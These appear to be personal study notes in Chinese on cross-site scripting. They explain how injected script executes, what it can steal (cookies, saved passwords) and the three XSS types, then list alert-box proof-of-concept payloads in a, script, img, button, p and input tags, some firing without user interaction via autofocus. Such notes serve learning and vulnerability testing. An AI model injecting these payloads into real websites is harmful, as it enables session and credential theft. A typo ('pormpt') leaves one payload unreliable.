个人对XSS攻击的笔记
原理:对可以控制传参的位置,比如url链接中,输入框中,首先闭合输出参数位置前后网页标签,在闭合的中间加上JavaScript代码或者其他的html标签,使得网页能够执行你添加的参数功能。
危害:凡是js能做的,大部分xss漏洞都能利用,常见的比如获取当前cookie,获取浏览器保存的账号密码 、获取屏幕截图,获取页面的数据,改变页面的逻辑,向服务器发送数据请求等。
情景:在挖洞的情景下,只要保证能弹个窗,或者执行js代码即可。但是其中会涉及到很多前端相关的知识,比如如何在不同标签下触发弹窗,怎么绕过拦截等等。
xss的分类:
·反射型
·储存型
·DOM型
弹窗标签:
a标签
<a href=javascript:alert(1)>点我啊</a>//伪协议
script标签
<script> alert(1) </script> //直接弹出,只有一个确定键<script> confirm(1) </script>//直接弹出,有确定和取消键<script> pormpt(1) </script> //直接弹出,显示一个test输入框
img标签
<img src=x onerror=alert(1)> //可以使用事件触发
button标签
<button onclick=alert(1) >点我</button> //点击弹窗<button onfocus=alert(1) autofocus> //不需要点击就能弹窗
p标签
<p onmouseover=alert(1)>点我</p> //可以直接使用事件触发
input标签
和button一样通过autocus可以达到无需交互即可弹窗的效果
<input onfocus=javascript:alert(1) autofocus><input onblur=javascript:alert(1) autofocus><input autofocus>